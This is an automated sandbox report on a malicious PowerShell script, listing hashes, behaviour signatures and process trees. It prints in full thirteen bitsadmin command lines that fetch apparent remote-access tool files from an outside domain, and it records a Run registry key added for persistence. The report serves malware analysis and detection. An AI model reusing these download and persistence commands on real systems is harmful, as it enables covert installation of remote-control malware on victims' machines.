Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
22-08-2024 22:46
Static task
static1
Behavioral task
behavioral1
Sample
f76b4b34066533b5484ea308fb1475e1c4e63e861770f51ec4fdb6fc8d414941.ps1
Resource
win7-20240705-en
windows7-x64
6 signatures
300 seconds
Behavioral task
behavioral2
Sample
f76b4b34066533b5484ea308fb1475e1c4e63e861770f51ec4fdb6fc8d414941.ps1
Resource
win10-20240404-en
windows10-1703-x64
10 signatures
300 seconds
General
-
Target
f76b4b34066533b5484ea308fb1475e1c4e63e861770f51ec4fdb6fc8d414941.ps1
-
Size
2KB
-
MD5
b4c4c63eb1fd1bde068d7a7f8bced385
-
SHA1
00c3c94cba10abecd56eb5f0832aaf4f7c546fa0
-
SHA256
f76b4b34066533b5484ea308fb1475e1c4e63e861770f51ec4fdb6fc8d414941
-
SHA512
fa613c069967b078aa26d9de953ec2caf8f47ced2d013df2acde3017a69cb79bcb31bbafa4125a1f95d34cfdc71c62775f4bebf134972ddd64c40fbf73358a08
Score
8/10
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 13 IoCs
pid Process 2948 bitsadmin.exe 1752 bitsadmin.exe 1532 bitsadmin.exe 2772 bitsadmin.exe 2312 bitsadmin.exe 1476 bitsadmin.exe 2880 bitsadmin.exe 2704 bitsadmin.exe 2956 bitsadmin.exe 2624 bitsadmin.exe 1984 bitsadmin.exe 340 bitsadmin.exe 2792 bitsadmin.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\BrowsingCache = "C:\\Users\\Admin\\AppData\\Roaming\\BrowsingCache\\client32.exe" powershell.exe -
pid Process 2564 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2564 powershell.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2564 wrote to memory of 2956 2564 powershell.exe 32 PID 2564 wrote to memory of 2956 2564 powershell.exe 32 PID 2564 wrote to memory of 2956 2564 powershell.exe 32 PID 2564 wrote to memory of 2880 2564 powershell.exe 33 PID 2564 wrote to memory of 2880 2564 powershell.exe 33 PID 2564 wrote to memory of 2880 2564 powershell.exe 33 PID 2564 wrote to memory of 2772 2564 powershell.exe 34 PID 2564 wrote to memory of 2772 2564 powershell.exe 34 PID 2564 wrote to memory of 2772 2564 powershell.exe 34 PID 2564 wrote to memory of 2948 2564 powershell.exe 35 PID 2564 wrote to memory of 2948 2564 powershell.exe 35 PID 2564 wrote to memory of 2948 2564 powershell.exe 35 PID 2564 wrote to memory of 2792 2564 powershell.exe 36 PID 2564 wrote to memory of 2792 2564 powershell.exe 36 PID 2564 wrote to memory of 2792 2564 powershell.exe 36 PID 2564 wrote to memory of 2624 2564 powershell.exe 37 PID 2564 wrote to memory of 2624 2564 powershell.exe 37 PID 2564 wrote to memory of 2624 2564 powershell.exe 37 PID 2564 wrote to memory of 2704 2564 powershell.exe 38 PID 2564 wrote to memory of 2704 2564 powershell.exe 38 PID 2564 wrote to memory of 2704 2564 powershell.exe 38 PID 2564 wrote to memory of 1984 2564 powershell.exe 39 PID 2564 wrote to memory of 1984 2564 powershell.exe 39 PID 2564 wrote to memory of 1984 2564 powershell.exe 39 PID 2564 wrote to memory of 1476 2564 powershell.exe 40 PID 2564 wrote to memory of 1476 2564 powershell.exe 40 PID 2564 wrote to memory of 1476 2564 powershell.exe 40 PID 2564 wrote to memory of 340 2564 powershell.exe 41 PID 2564 wrote to memory of 340 2564 powershell.exe 41 PID 2564 wrote to memory of 340 2564 powershell.exe 41 PID 2564 wrote to memory of 2312 2564 powershell.exe 42 PID 2564 wrote to memory of 2312 2564 powershell.exe 42 PID 2564 wrote to memory of 2312 2564 powershell.exe 42 PID 2564 wrote to memory of 1752 2564 powershell.exe 43 PID 2564 wrote to memory of 1752 2564 powershell.exe 43 PID 2564 wrote to memory of 1752 2564 powershell.exe 43 PID 2564 wrote to memory of 1532 2564 powershell.exe 44 PID 2564 wrote to memory of 1532 2564 powershell.exe 44 PID 2564 wrote to memory of 1532 2564 powershell.exe 44
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\f76b4b34066533b5484ea308fb1475e1c4e63e861770f51ec4fdb6fc8d414941.ps11⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/NSM.LIC C:\Users\Admin\AppData\Roaming\BrowsingCache\NSM.LIC2⤵
- Download via BitsAdmin
PID:2956
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/nsm_vpro.ini C:\Users\Admin\AppData\Roaming\BrowsingCache\nsm_vpro.ini2⤵
- Download via BitsAdmin
PID:2880
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/PCICHEK.DLL C:\Users\Admin\AppData\Roaming\BrowsingCache\PCICHEK.DLL2⤵
- Download via BitsAdmin
PID:2772
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/TCCTL32.DLL C:\Users\Admin\AppData\Roaming\BrowsingCache\TCCTL32.DLL2⤵
- Download via BitsAdmin
PID:2948
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/client32.exe C:\Users\Admin\AppData\Roaming\BrowsingCache\client32.exe2⤵
- Download via BitsAdmin
PID:2792
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/msvcr100.dll C:\Users\Admin\AppData\Roaming\BrowsingCache\msvcr100.dll2⤵
- Download via BitsAdmin
PID:2624
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/AudioCapture.dll C:\Users\Admin\AppData\Roaming\BrowsingCache\AudioCapture.dll2⤵
- Download via BitsAdmin
PID:2704
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/pcicapi.dll C:\Users\Admin\AppData\Roaming\BrowsingCache\pcicapi.dll2⤵
- Download via BitsAdmin
PID:1984
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/nskbfltr.inf C:\Users\Admin\AppData\Roaming\BrowsingCache\nskbfltr.inf2⤵
- Download via BitsAdmin
PID:1476
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/HTCTL32.DLL C:\Users\Admin\AppData\Roaming\BrowsingCache\HTCTL32.DLL2⤵
- Download via BitsAdmin
PID:340
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/remcmdstub.exe C:\Users\Admin\AppData\Roaming\BrowsingCache\remcmdstub.exe2⤵
- Download via BitsAdmin
PID:2312
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/PCICL32.DLL C:\Users\Admin\AppData\Roaming\BrowsingCache\PCICL32.DLL2⤵
- Download via BitsAdmin
PID:1752
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /tranSFeR o6VqG3 /dowNLOaD /PRIoRiTy nOrMAl https://quickfileupdate.com/udp/dwn/client32.ini C:\Users\Admin\AppData\Roaming\BrowsingCache\client32.ini2⤵
- Download via BitsAdmin
PID:1532
-